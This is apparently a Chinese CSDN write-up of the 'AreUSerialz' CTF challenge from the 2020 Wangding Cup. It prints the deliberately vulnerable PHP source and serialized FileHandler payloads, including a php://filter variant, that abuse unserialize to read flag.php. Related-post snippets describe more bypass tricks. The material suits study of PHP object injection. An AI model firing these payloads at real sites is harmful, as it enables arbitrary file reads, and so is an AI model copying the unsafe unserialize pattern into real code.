[网鼎杯 2020 青龙组]AreUSerialz 1

最新推荐文章于 2024-01-21 11:13:41 发布
最新推荐文章于 2024-01-21 11:13:41 发布
阅读量137 收藏
点赞数 1
文章标签: php 信息安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/116534668
版权

PHP 反序列化 漏洞利用 安全防护 文件操作
关键词由CSDN通过智能技术生成

打开环境

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

很简单了就不详细说了
绕过不懂可以看看我其他关于反序列的文章
这里入口为destruct
出口为file_get_contents
所以构造payload

<?php
class FileHandler {

    public $op = 2;
    public $filename = 'flag.php';
    public $content;
}
$a = new FileHandler();
var_dump(serialize($a));

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

在这里插入图片描述
或者利用php协议
构造payload

<?php
class FileHandler {

    public $op = 2;
    public $filename = 'php://filter/read=convert.base64-encode/resource=flag.php';
    public $content;
}
$a = new FileHandler();
var_dump(serialize($a));

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}

在这里插入图片描述
解码得到flag
在这里插入图片描述
希望这篇文章能够帮助你!

M1kael
关注
[网鼎杯 2020 青龙]AreUSerialz1
kw741951的博客
08-01 849
分析此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的process()方法和output()方法,所以write()方法也可以删除不用看, protected $content属性也可直接删了。根据代码逻辑分析,咱们可知 function __construct() {按照常规方法,首先,我们先将代码复制到本地进行序列化构造,$s的值ASCII码范围得在32<=$s<=125;根据构造函数is_valid($s) 可知,再根据构造函数read()可知,
序列化2之[网鼎杯 2020 青龙]AreUSerialz1
qq_58970968的博客
04-17 2273
class FileHandler { protected $op; protected $filename; protected $content; function __construct(){ $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); } public .
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
最新发布
m0_73615178的博客
01-21 661
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
CTF赛题-[网鼎杯2020青龙]AreUSerialz
m0_57379855的博客
03-25 2135
CTF赛题-[网鼎杯2020青龙]AreUSerialz代码审计构造函数 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filenam
网鼎杯2020[青龙]--AreUSerialz
Oavinci的博客
06-28 7105
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
m0_73995922的博客
12-21 273
1.首先因为题目类型是protected,在我们进行序列化时会产生%00*%00,%00对应ASCII码0,这里我们可以利用php7.1+版本对属性类型不敏感,在序列化时将类型改为public。但是我们看到is_valid对我们的payload进行了限制 需要我们输入的字符串的字符ASCII码在32-125之间。2.然后是===强等绕过 可以将 op=(int)2 将op改为int类型。同时我们还需要绕过_destruct() 也就是绕过 op==='2'我们需要使op==2。查看源码得到flag。
[网鼎杯 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3091
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
BUU实战笔记——[网鼎杯 2020 青龙]AreUSerialz1
qq_51175992的博客
07-14 196
方向很明确的PHP反序列化题,找到两个特征之后,再找对象、属性及属性的值就可以做出来啦!
------已搬运-------BUUCTF:[网鼎杯 2020 青龙]AreUSerialz 1
Zero_Adam的博客
01-31 358
[网鼎杯 2020 青龙]AreUSerialz 1 先记录一下我自己的误区/易错点: __construct() 方法,在unserialize()反序列化之后不执行。。。 尽管他口口声声说 __construct() 在生成一个新的实例时会调用该方法。但仅仅限于 $a = new A() 才成立。反序列出来的不执行该方法 注意PHP的===,和弱类型比较等,这些点可以进行绕过 知识点: 一、序列化中的表征字符型的s,可以替换称S。表示 支持后面的字符串用16进制表示。可在这种情形下,将%0
web buuctf [网鼎杯 2020 青龙]AreUSerialz1
weixin_44214568的博客
03-17 810
1.代码审计(魔法函数,序列化) 2.成员变量关键字 public、protected、private 代码粘贴如下: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
允许外网访问青龙面板
10-10
要允许外网访问青龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,青龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:打开青龙面板的配置文件 `config/auth.json`,将 `address` 字段的值修改为 `0.0.0.0`,表示监听所有可用的网络接口。 3. 配置登录验证:如果您希望对外网访问青龙面板进行登录验证,可以在 `config/auth.json` 文件中修改 `whitelist` 字段,添加允许访问的IP地址或IP段。 4. 重启青龙面板:保存配置文件后,重新启动青龙面板,使配置生效。 请注意,开放面板的外网访问涉及到网络安全风险,请确保您对服务器和青龙面板进行适当的安全防护和访问控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值